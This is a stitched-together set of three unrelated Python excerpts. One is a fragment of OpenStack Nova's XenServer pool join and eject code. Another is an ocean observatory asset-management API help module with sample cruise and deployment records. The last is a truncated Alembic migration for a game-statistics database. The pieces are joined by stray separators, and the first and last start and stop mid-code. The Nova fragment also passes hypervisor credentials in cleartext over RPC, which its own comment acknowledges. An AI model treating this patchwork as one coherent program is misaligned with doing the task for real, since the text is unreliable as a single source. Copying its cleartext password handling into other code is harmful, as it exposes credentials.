raise exception.InvalidAggregateAction(
aggregate_id=aggregate.id,
action='remove_from_aggregate',
reason=_('Unable to eject %(host)s '
'from the pool; pool not empty')
% locals())
self._clear_pool(aggregate.id)
for key in ['main_compute', host]:
db.aggregate_metadata_delete(context, aggregate.id, key)
elif main_compute and main_compute != host:
# A main exists -> forward pool-eject request to main
forward_request(context, "remove_aggregate_host", main_compute,
aggregate.id, host,
self._host_addr, self._host_uuid)
else:
# this shouldn't have happened
raise exception.AggregateError(aggregate_id=aggregate.id,
action='remove_from_aggregate',
reason=_('Unable to eject %(host)s '
'from the pool; No main found')
% locals())
def _join_subordinate(self, aggregate_id, host, compute_uuid, url, user, passwd):
"""Joins a subordinate into a XenServer resource pool."""
try:
args = {'compute_uuid': compute_uuid,
'url': url,
'user': user,
'password': passwd,
'force': json.dumps(FLAGS.use_join_force),
'main_addr': self._host_addr,
'main_user': FLAGS.xenapi_connection_username,
'main_pass': FLAGS.xenapi_connection_password, }
self._session.call_plugin('xenhost', 'host_join', args)
except self.XenAPI.Failure as e:
LOG.error(_("Pool-Join failed: %(e)s") % locals())
raise exception.AggregateError(aggregate_id=aggregate_id,
action='add_to_aggregate',
reason=_('Unable to join %(host)s '
'in the pool') % locals())
def _eject_subordinate(self, aggregate_id, compute_uuid, host_uuid):
"""Eject a subordinate from a XenServer resource pool."""
try:
# shutdown nova-compute; if there are other VMs running, e.g.
# guest instances, the eject will fail. That's a precaution
# to deal with the fact that the admin should evacuate the host
# first. The eject wipes out the host completely.
vm_ref = self._session.call_xenapi('VM.get_by_uuid', compute_uuid)
self._session.call_xenapi("VM.clean_shutdown", vm_ref)
host_ref = self._session.call_xenapi('host.get_by_uuid', host_uuid)
self._session.call_xenapi("pool.eject", host_ref)
except self.XenAPI.Failure as e:
LOG.error(_("Pool-eject failed: %(e)s") % locals())
raise exception.AggregateError(aggregate_id=aggregate_id,
action='remove_from_aggregate',
reason=str(e.details))
def _init_pool(self, aggregate_id, aggregate_name):
"""Set the name label of a XenServer pool."""
try:
pool_ref = self._session.call_xenapi("pool.get_all")[0]
self._session.call_xenapi("pool.set_name_label",
pool_ref, aggregate_name)
except self.XenAPI.Failure as e:
LOG.error(_("Unable to set up pool: %(e)s.") % locals())
raise exception.AggregateError(aggregate_id=aggregate_id,
action='add_to_aggregate',
reason=str(e.details))
def _clear_pool(self, aggregate_id):
"""Clear the name label of a XenServer pool."""
try:
pool_ref = self._session.call_xenapi('pool.get_all')[0]
self._session.call_xenapi('pool.set_name_label', pool_ref, '')
except self.XenAPI.Failure as e:
LOG.error(_("Pool-set_name_label failed: %(e)s") % locals())
raise exception.AggregateError(aggregate_id=aggregate_id,
action='remove_from_aggregate',
reason=str(e.details))
def forward_request(context, request_type, main, aggregate_id,
subordinate_compute, subordinate_address, subordinate_uuid):
"""Casts add/remove requests to the pool main."""
# replace the address from the xenapi connection url
# because this might be 169.254.0.1, i.e. xenapi
# NOTE: password in clear is not great, but it'll do for now
sender_url = swap_xapi_host(FLAGS.xenapi_connection_url, subordinate_address)
rpc.cast(context, db.queue_get_for(context, FLAGS.compute_topic, main),
{"method": request_type,
"args": {"aggregate_id": aggregate_id,
"host": subordinate_compute,
"url": sender_url,
"user": FLAGS.xenapi_connection_username,
"passwd": FLAGS.xenapi_connection_password,
"compute_uuid": vm_utils.get_this_vm_uuid(),
"xenhost_uuid": subordinate_uuid, },
})
def swap_xapi_host(url, host_addr):
"""Replace the XenServer address present in 'url' with 'host_addr'."""
temp_url = urlparse.urlparse(url)
_netloc, sep, port = temp_url.netloc.partition(':')
return url.replace(temp_url.netloc, '%s%s%s' % (host_addr, sep, port))
| |
#!/usr/bin/env python
def get_help_data_12587_events():
"""
Asset Management help - Category 'events'
Data store of information to be presented when a help request is made for port 12587.
Returns a list of dictionaries associated with various requests supported on that port.
"""
help_data = [
{
'root': 'events',
'endpoint': 'events',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all events. Sample response content abbreviated.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'events',
'sample_response': [{
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "AR-04",
"cruiseIdentifier" : None,
"shipName" : "R/V Neil Armstrong",
"editPhase" : "OPERATIONAL",
"eventId" : 1,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "AR-04",
"eventStartTime" : 1463011200000,
"eventStopTime" : 1464825600000,
"notes" : "Pioneer 6 (rvdata)",
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495138206531
}]
}]
},
{
'root': 'events',
'endpoint': 'events/{id}',
'method': 'GET',
'permission_required': False,
'description': 'Get event by identifier. ',
'data_required': True,
'data_format': [
{ 'name': 'id',
'type': 'int',
'description': 'The event identifier.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/1',
'sample_response': {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "AR-04",
"cruiseIdentifier" : None,
"shipName" : "R/V Neil Armstrong",
"editPhase" : "OPERATIONAL",
"eventId" : 1,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "AR-04",
"eventStartTime" : 1463011200000,
"eventStopTime" : 1464825600000,
"notes" : "Pioneer 6 (rvdata)",
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495138206531
}
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/inv',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique subsites over all deployments. ',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'events/deployment/inv',
'sample_response': ["CE01ISSM", "CE01ISSP", "CE02SHBP", "CE02SHSM"]
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique nodes for a specific subsite over all deployments. ',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/deployment/inv/CE01ISSM',
'sample_response': ["MFC31", "MFD35", "MFD37", "RID16", "SBC11", "SBD17"]
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/inv/{subsite}/{node}',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique sensors for a specific subsite and node ' +
'over all deployments.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/deployment/inv/CE01ISSM/MFC31',
'sample_response': ["00-CPMENG000"]
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/inv/{subsite}/{node}/{sensor}',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique deployment numbers for a specified subsite, node ' +
'and sensor over all deployments.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/deployment/inv/CE01ISSM/MFC31/00-CPMENG000',
'sample_response': [1, 2, 3, 6, 7]
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/inv/{subsite}/{node}/{sensor}/{deploymentNumber}',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique deployment numbers for a specified subsite, node, ' +
'and sensor over all deployments. A deploymentNumber of -1 will return all ' +
'deployments for the reference designator.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'The subsite portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'node',
'type': 'str',
'description': 'The node portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'sensor',
'type': 'str',
'description': 'The sensor portion of the reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'deploymentNumber',
'type': 'int',
'description': 'The deployment number; -1 will return all deployments for ' +
'the reference designator.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/deployment/inv/CE01ISSM/MFC31/00-CPMENG000/1',
'sample_response': [
{
"@class" : ".XDeployment",
"location" : {
"depth" : 25.0,
"location" : [ -124.0956, 44.65828 ],
"latitude" : 44.65828,
"longitude" : -124.0956,
"orbitRadius" : None
},
"node" : None,
"sensor" : {
"@class" : ".XInstrument",
"calibration" : [ ],
"events" : [ ],
"assetId" : 2664,
"remoteResources" : [ ],
"serialNumber" : "1",
"name" : "1",
"location" : None,
"owner" : None,
"description" : "Multi-Function Node Communications and Power Manager",
"manufacturer" : "WHOI",
"notes" : None,
"uid" : "CGCON-MCPM03-00001",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Sensor",
"mobile" : False,
"modelNumber" : "CPM",
"purchasePrice" : None,
"purchaseDate" : None,
"deliveryDate" : None,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455046865
},
"referenceDesignator" : "CE01ISSM-MFC31-00-CPMENG000",
"editPhase" : "OPERATIONAL",
"deploymentNumber" : 1,
"versionNumber" : 1,
"mooring" : {
"@class" : ".XMooring",
"events" : [ ],
"assetId" : 138,
"remoteResources" : [ ],
"serialNumber" : "CE01ISSM-00001",
"name" : "CE01ISSM-00001",
"location" : None,
"owner" : None,
"description" : "Coastal Endurance Oregon Inshore Surface Mooring",
"manufacturer" : "WHOI",
"notes" : None,
"uid" : "CGMCE-01ISSM-00001",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Mooring",
"mobile" : False,
"modelNumber" : "CE01ISSM",
"purchasePrice" : 318795.53,
"purchaseDate" : 1361145600000,
"deliveryDate" : 1361145600000,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455036366
},
"deployCruiseInfo" : {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "OC1404B",
"cruiseIdentifier" : None,
"shipName" : "R/V Oceanus",
"editPhase" : "OPERATIONAL",
"eventId" : 29,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "OC1404B",
"eventStartTime" : 1397520000000,
"eventStopTime" : 1398038400000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495455035279
},
"recoverCruiseInfo" : None,
"deployedBy" : None,
"recoveredBy" : None,
"inductiveId" : None,
"waterDepth" : 25.0,
"ingestInfo" : [ ],
"eventId" : 231,
"assetUid" : None,
"eventType" : "DEPLOYMENT",
"eventName" : "CE01ISSM-MFC31-00-CPMENG000",
"eventStartTime" : 1397767500000,
"eventStopTime" : 1408228200000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [CE01ISSM_Deploy.xlsx]",
"lastModifiedTimestamp" : 1495455063059
}]
}]
},
{
'root': 'events',
'endpoint': 'events/deployment/query',
'method': 'GET',
'permission_required': False,
'description': 'Get all deployments for reference designator, whether platform, node ' +
'or instrument.',
'data_required': True,
'data_format': [
{ 'name': 'refdes',
'type': 'str',
'description': 'A reference designator.',
'valid_values': None,
'default': None
},
{ 'name': 'deploymentnum',
'type': 'int',
'description': '[Optional] Deployment number. Normally a positive integer. ' +
'Default -1, selects all deployments.',
'valid_values': None,
'default': None
},
{ 'name': 'beginDT',
'type': 'longint',
'description': '[Optional] Start time for filter.',
'valid_values': None,
'default': None
},
{ 'name': 'endDT',
'type': 'longint',
'description': '[Optional] End time for filter.',
'valid_values': None,
'default': None
},
{ 'name': 'notes',
'type': 'bool',
'description': '[Optional] Return notes field value; default is False',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/deployment/query?refdes=CE01ISSM-MFC31&deploymentnum=1¬es=True',
'sample_response': [
{
"@class" : ".XDeployment",
"location" : {
"depth" : 25.0,
"location" : [ -124.0956, 44.65828 ],
"latitude" : 44.65828,
"longitude" : -124.0956,
"orbitRadius" : None
},
"node" : None,
"sensor" : {
"@class" : ".XInstrument",
"calibration" : [ ],
"events" : [ ],
"assetId" : 2664,
"remoteResources" : [ ],
"serialNumber" : "1",
"name" : "1",
"location" : None,
"owner" : None,
"description" : "Multi-Function Node Communications and Power Manager",
"manufacturer" : "WHOI",
"notes" : "CE01ISSM-0000(1,2)-CPM3",
"uid" : "CGCON-MCPM03-00001",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Sensor",
"mobile" : False,
"modelNumber" : "CPM",
"purchasePrice" : None,
"purchaseDate" : None,
"deliveryDate" : None,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455046865
},
"referenceDesignator" : "CE01ISSM-MFC31-00-CPMENG000",
"editPhase" : "OPERATIONAL",
"deploymentNumber" : 1,
"versionNumber" : 1,
"mooring" : {
"@class" : ".XMooring",
"events" : [ ],
"assetId" : 138,
"remoteResources" : [ ],
"serialNumber" : "CE01ISSM-00001",
"name" : "CE01ISSM-00001",
"location" : None,
"owner" : None,
"description" : "Coastal Endurance Oregon Inshore Surface Mooring",
"manufacturer" : "WHOI",
"notes" : None,
"uid" : "CGMCE-01ISSM-00001",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Mooring",
"mobile" : False,
"modelNumber" : "CE01ISSM",
"purchasePrice" : 318795.53,
"purchaseDate" : 1361145600000,
"deliveryDate" : 1361145600000,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455036366
},
"deployCruiseInfo" : {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "OC1404B",
"cruiseIdentifier" : None,
"shipName" : "R/V Oceanus",
"editPhase" : "OPERATIONAL",
"eventId" : 29,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "OC1404B",
"eventStartTime" : 1397520000000,
"eventStopTime" : 1398038400000,
"notes" : "Endurance 1 (rvdata)",
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495455035279
},
"recoverCruiseInfo" : None,
"deployedBy" : None,
"recoveredBy" : None,
"inductiveId" : None,
"waterDepth" : 25.0,
"ingestInfo" : [ ],
"eventId" : 231,
"assetUid" : None,
"eventType" : "DEPLOYMENT",
"eventName" : "CE01ISSM-MFC31-00-CPMENG000",
"eventStartTime" : 1397767500000,
"eventStopTime" : 1408228200000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [CE01ISSM_Deploy.xlsx]",
"lastModifiedTimestamp" : 1495455063059
}]
}]
},
{
'root': 'events',
'endpoint': 'events/cruise/inv',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all unique cruise identifiers in the Asset Management.',
'data_required': False,
'data_format': None,
'samples': [{
'sample_request': 'events/cruise/inv',
'sample_response': ["AR-03", "AR-04", "AR-07-01", "AR-08A", "AR-08B", "AR1-07"]
}]
},
{
'root': 'events',
'endpoint': 'events/cruise/inv/{subsite}',
'method': 'GET',
'permission_required': False,
'description': 'Get a a sorted list of all unique cruise identifiers in Asset Management ' +
'associated with a full or partial deployment subsite identifier.',
'data_required': True,
'data_format': [
{ 'name': 'subsite',
'type': 'str',
'description': 'Full or partial subsite (i.e. \'CE01ISSM\' or \'CE\').',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/cruise/inv/CE',
'sample_response': [ "AT37-03", "EK-1503", "EK-1506", "EK-1507", "EK-1508"]
}]
},
{
'root': 'events',
'endpoint': 'events/cruise/rec/{uniqueCruiseId}',
'method': 'GET',
'permission_required': False,
'description': 'Get a single cruise info record using the unique cruise identifier.',
'data_required': True,
'data_format': [
{ 'name': 'uniqueCruiseId',
'type': 'str',
'description': 'The unique cruise identifier.',
'valid_values': None,
'default': None
}
],
'samples': [{
'sample_request': 'events/cruise/rec/AR-03',
'sample_response': {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "AR-03",
"cruiseIdentifier" : None,
"shipName" : "R/V Neil Armstrong ",
"editPhase" : "OPERATIONAL",
"eventId" : 6,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "AR-03",
"eventStartTime" : 1462147200000,
"eventStopTime" : 1462752000000,
"notes" : "Pioneer (rvdata)",
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495455035256
}
}]
},
{
'root': 'events',
'endpoint': 'events/cruise/deployments/{uniqueCruiseId}',
'method': 'GET',
'permission_required': False,
'description': 'Get a list of all deployments for a uniqueCruiseId.',
'data_required': True,
'data_format': [
{ 'name': 'uniqueCruiseId',
'type': 'str',
'description': 'The unique cruise identifier.',
'valid_values': None,
'default': None
}],
'samples': [{
'sample_request': 'events/cruise/deployments/AT-26-29',
'sample_response': [
{
"@class" : ".XDeployment",
"location" : {
"depth" : 12.0,
"location" : [ -89.3575, -54.40833 ],
"latitude" : -54.40833,
"longitude" : -89.3575,
"orbitRadius" : None
},
"node" : None,
"sensor" : {
"@class" : ".XInstrument",
"calibration" : [ ],
"events" : [ ],
"assetId" : 3084,
"remoteResources" : [ ],
"serialNumber" : "GS01SUMO-00001-DCL16",
"name" : "GS01SUMO-00001-DCL16",
"location" : None,
"owner" : None,
"description" : "Near Surface Instrument Frame Data Concentrator Logger",
"manufacturer" : "WHOI",
"notes" : None,
"uid" : "R00065",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Sensor",
"mobile" : False,
"modelNumber" : "DCL",
"purchasePrice" : None,
"purchaseDate" : None,
"deliveryDate" : None,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455048680
},
"referenceDesignator" : "GS01SUMO-RID16-00-DCLENG000",
"editPhase" : "OPERATIONAL",
"deploymentNumber" : 1,
"versionNumber" : 1,
"mooring" : {
"@class" : ".XMooring",
"events" : [ ],
"assetId" : 42,
"remoteResources" : [ ],
"serialNumber" : "GS01SUMO-00001",
"name" : "GS01SUMO-00001",
"location" : None,
"owner" : None,
"description" : "Global Southern Ocean Apex Surface Mooring",
"manufacturer" : "WHOI",
"notes" : None,
"uid" : "CGMGS-01SUMO-00001",
"editPhase" : "OPERATIONAL",
"physicalInfo" : {
"height" : -1.0,
"width" : -1.0,
"length" : -1.0,
"weight" : -1.0
},
"assetType" : "Mooring",
"mobile" : False,
"modelNumber" : "GS01SUMO",
"purchasePrice" : None,
"purchaseDate" : None,
"deliveryDate" : None,
"depthRating" : None,
"ooiPropertyNumber" : None,
"ooiPartNumber" : None,
"ooiSerialNumber" : None,
"deliveryOrderNumber" : None,
"institutionPropertyNumber" : None,
"institutionPurchaseOrderNumber" : None,
"shelfLifeExpirationDate" : None,
"firmwareVersion" : None,
"softwareVersion" : None,
"powerRequirements" : None,
"dataSource" : "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
"lastModifiedTimestamp" : 1495455036018
},
"deployCruiseInfo" : {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "AT-26-29",
"cruiseIdentifier" : None,
"shipName" : "R/V Atlantis",
"editPhase" : "OPERATIONAL",
"eventId" : 9,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "AT-26-29",
"eventStartTime" : 1423699200000,
"eventStopTime" : 1425513600000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495455035260
},
"recoverCruiseInfo" : {
"@class" : ".CruiseInfo",
"uniqueCruiseIdentifier" : "NBP-15-11",
"cruiseIdentifier" : None,
"shipName" : "R/V Nathaniel B. Palmer",
"editPhase" : "OPERATIONAL",
"eventId" : 28,
"assetUid" : None,
"eventType" : "CRUISE_INFO",
"eventName" : "NBP-15-11",
"eventStartTime" : 1449446400000,
"eventStopTime" : 1451865600000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [CruiseInformation.xlsx]",
"lastModifiedTimestamp" : 1495455035278
},
"deployedBy" : None,
"recoveredBy" : None,
"inductiveId" : None,
"waterDepth" : 4611.0,
"ingestInfo" : [ ],
"eventId" : 3534,
"assetUid" : None,
"eventType" : "DEPLOYMENT",
"eventName" : "GS01SUMO-RID16-00-DCLENG000",
"eventStartTime" : 1424293560000,
"eventStopTime" : 1451215200000,
"notes" : None,
"tense" : "UNKNOWN",
"dataSource" : "Load from [GS01SUMO_Deploy.xlsx]",
"lastModifiedTimestamp" : 1495455092700
}]
}]
}
]
return help_data
| |
"""Init db
Revision ID: c608894207f9
Revises:
Create Date: 2018-01-15 00:43:49.233788
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = 'c608894207f9'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('malf_module',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('match',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('parsed_file', sa.String(length=255), nullable=False),
sa.Column('data_version', sa.String(length=45), nullable=True),
sa.Column('mastermode', sa.String(length=255), nullable=True),
sa.Column('modes_string', sa.String(length=65535), nullable=True),
sa.Column('crewscore', sa.Integer(), nullable=True),
sa.Column('nuked', sa.Boolean(), nullable=True),
sa.Column('crates_ordered', sa.Integer(), nullable=True),
sa.Column('blood_spilled', sa.Integer(), nullable=True),
sa.Column('artifacts_discovered', sa.Integer(), nullable=True),
sa.Column('tech_total', sa.Integer(), nullable=True),
sa.Column('mapname', sa.String(), nullable=True),
sa.Column('borgs_at_roundend', sa.Integer(), nullable=True),
sa.Column('remaining_heads', sa.Integer(), nullable=True),
sa.Column('starttime', sa.Integer(), nullable=True),
sa.Column('endtime', sa.Integer(), nullable=True),
sa.Column('round_length', sa.Integer(), nullable=True),
sa.Column('cult_runes_written', sa.Integer(), nullable=True),
sa.Column('cult_runes_nulled', sa.Integer(), nullable=True),
sa.Column('cult_runes_fumbled', sa.Integer(), nullable=True),
sa.Column('cult_converted', sa.Integer(), nullable=True),
sa.Column('cult_tomes_created', sa.Integer(), nullable=True),
sa.Column('cult_narsie_summoned', sa.Boolean(), nullable=True),
sa.Column('cult_narsie_corpses_fed', sa.Integer(), nullable=True),
sa.Column('cult_surviving_cultists', sa.Integer(), nullable=True),
sa.Column('cult_deconverted', sa.Integer(), nullable=True),
sa.Column('xeno_eggs_laid', sa.Integer(), nullable=True),
sa.Column('xeno_faces_hugged', sa.Integer(), nullable=True),
sa.Column('xeno_faces_protected', sa.Integer(), nullable=True),
sa.Column('blob_wins', sa.Boolean(), nullable=True),
sa.Column('blob_spawned_blob_players', sa.Integer(), nullable=True),
sa.Column('blob_spores_spawned', sa.Integer(), nullable=True),
sa.Column('blob_res_generated', sa.Integer(), nullable=True),
sa.Column('malf_won', sa.Boolean(), nullable=True),
sa.Column('malf_shunted', sa.Boolean(), nullable=True),
sa.Column('revsquad_won', sa.Boolean(), nullable=True),
sa.Column('start_datetime', sa.DateTime(), nullable=True),
sa.Column('end_datetime', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('parsed_file')
)
op.create_index(op.f('ix_match_mastermode'), 'match', ['mastermode'], unique=False)
op.create_table('revsquad_item',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('antag_objective',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('mindname', sa.String(length=100), nullable=True),
sa.Column('mindkey', sa.String(length=30), nullable=True),
sa.Column('special_role', sa.String(length=30), nullable=True),
sa.Column('objective_type', sa.String(length=45), nullable=True),
sa.Column('objective_desc', sa.String(), nullable=True),
sa.Column('objective_succeeded', sa.Boolean(), nullable=True),
sa.Column('target_name', sa.String(length=100), nullable=True),
sa.Column('target_role', sa.String(length=100), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_antag_objective_match_id'), 'antag_objective', ['match_id'], unique=False)
op.create_table('badass_bundle_buy',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('mindname', sa.String(), nullable=True),
sa.Column('mindkey', sa.String(length=30), nullable=True),
sa.Column('traitor_buyer', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_badass_bundle_buy_match_id'), 'badass_bundle_buy', ['match_id'], unique=False)
op.create_table('death',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('mindname', sa.String(length=100), nullable=True),
sa.Column('mindkey', sa.String(length=30), nullable=True),
sa.Column('typepath', sa.String(length=200), nullable=True),
sa.Column('special_role', sa.String(length=100), nullable=True),
sa.Column('assigned_role', sa.String(length=100), nullable=True),
sa.Column('time_of_death', sa.Integer(), nullable=True),
sa.Column('death_x', sa.Integer(), nullable=True),
sa.Column('death_y', sa.Integer(), nullable=True),
sa.Column('death_z', sa.Integer(), nullable=True),
sa.Column('damage_brute', sa.Integer(), nullable=True),
sa.Column('damage_fire', sa.Integer(), nullable=True),
sa.Column('damage_toxin', sa.Integer(), nullable=True),
sa.Column('damage_oxygen', sa.Integer(), nullable=True),
sa.Column('damage_clone', sa.Integer(), nullable=True),
sa.Column('damage_brain', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_death_match_id'), 'death', ['match_id'], unique=False)
op.create_table('explosion',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('epicenter_x', sa.Integer(), nullable=True),
sa.Column('epicenter_y', sa.Integer(), nullable=True),
sa.Column('epicenter_z', sa.Integer(), nullable=True),
sa.Column('devestation_range', sa.Integer(), nullable=True),
sa.Column('heavy_impact_range', sa.Integer(), nullable=True),
sa.Column('light_impact_range', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_explosion_match_id'), 'explosion', ['match_id'], unique=False)
op.create_table('match_malf_module',
sa.Column('match_id', sa.Integer(), nullable=False),
sa.Column('module_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.ForeignKeyConstraint(['module_id'], ['malf_module.id'], ),
sa.PrimaryKeyConstraint('match_id', 'module_id')
)
op.create_table('match_revsquad_item',
sa.Column('match_id', sa.Integer(), nullable=False),
sa.Column('item_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['item_id'], ['revsquad_item.id'], ),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
sa.PrimaryKeyConstraint('match_id', 'item_id')
)
op.create_table('population_snapshot',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('match_id', sa.Integer(), nullable=True),
sa.Column('popcount', sa.Integer(), nullable=True),
sa.Column('time', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['match_id'], ['match.id'], ),
